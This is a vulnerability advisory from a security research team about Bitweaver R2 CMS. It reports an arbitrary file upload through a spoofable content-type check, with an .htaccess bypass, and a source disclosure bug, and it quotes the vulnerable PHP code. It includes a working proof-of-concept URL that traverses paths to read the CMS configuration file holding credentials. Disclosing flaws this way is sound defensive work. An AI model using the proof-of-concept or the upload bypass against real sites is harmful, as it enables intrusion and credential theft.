Bitweaver source code disclosure, arbitrary file upload
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Bitweaver R2 CMS
# Vendor: http://www.bitweaver.org
# Bugs: source code disclosure, arbitrary file upload
# Vulnerable Version: 2 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
Bitweaver is an open source content management system. Its speed and =20
power are ideal for large-scale community websites and corporate =20
applications, but it is simple enough for non-technical small site =20
users to set up and administrate.
####################
- Vulnerability:
####################
+--> arbitrary file upload
Code Snippet:
/fisheye/upload.php line#32-45
=09$i =3D 0;
=09foreach( array_keys( $_FILES ) as $key ) {
=09=09if( preg_match( '/(^image|pdf)/i', $_FILES[$key]['type'] ) ) {
=09=09=09$upImages[$key] =3D $_FILES[$key];
=09=09=09if( !empty( $_REQUEST['imagedata'][$i] ) ) {
=09=09=09=09$upData[$key] =3D $_REQUEST['imagedata'][$i];
=09=09=09} else {
=09=09=09=09$upData[$key] =3D array();
=09=09=09}
=09=09} elseif( !empty( $_FILES[$key]['tmp_name'] ) && !empty( =20
$_FILES[$key]['name'] ) ) {
=09=09=09$upArchives[$key] =3D $_FILES[$key];
=09=09}
=09=09$i++;
=09}
It's possible to upload arbitrary files with image/gif content-type =20
(this can be changed via local proxy or direct content altertion)
also its possible for an attacker to bypass "/storage/.htaccess" =20
restriction by uploadding his own .htaccess and control server settings.
+-->source code disclosure
Code Snippet:
/wiki/edit.php line#179-195
if( isset( $_REQUEST["suck_url"] ) ) {
=09// Suck another page and append to the end of current
=09require_once( UTIL_PKG_PATH.'htmlparser/html_parser_inc.php' );
=09$suck_url =3D isset( $_REQUEST["suck_url"] ) ? $_REQUEST["suck_url"] : ''=
;
=09$parsehtml =3D isset( $_REQUEST["parsehtml"] ) ? ( =20
$_REQUEST["parsehtml"] =3D=3D 'on' ? 'y' : 'n' ): 'n';
=09if( isset( $_REQUEST['do_suck'] ) && strlen( $suck_url ) > 0 ) {
=09=09.
=09=09.
=09=09.
=09=09$sdta =3D @file_get_contents( $suck_url );
POC: =20
http://localhost/bitweaver/wiki/edit.php?page=3DSandBox&suck_url=3D./../kern=
el/config_inc.php&do_suck=3Dh
####################
- Credit :
####################
Original Advisory:http://www.bugreport.ir/?/24
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com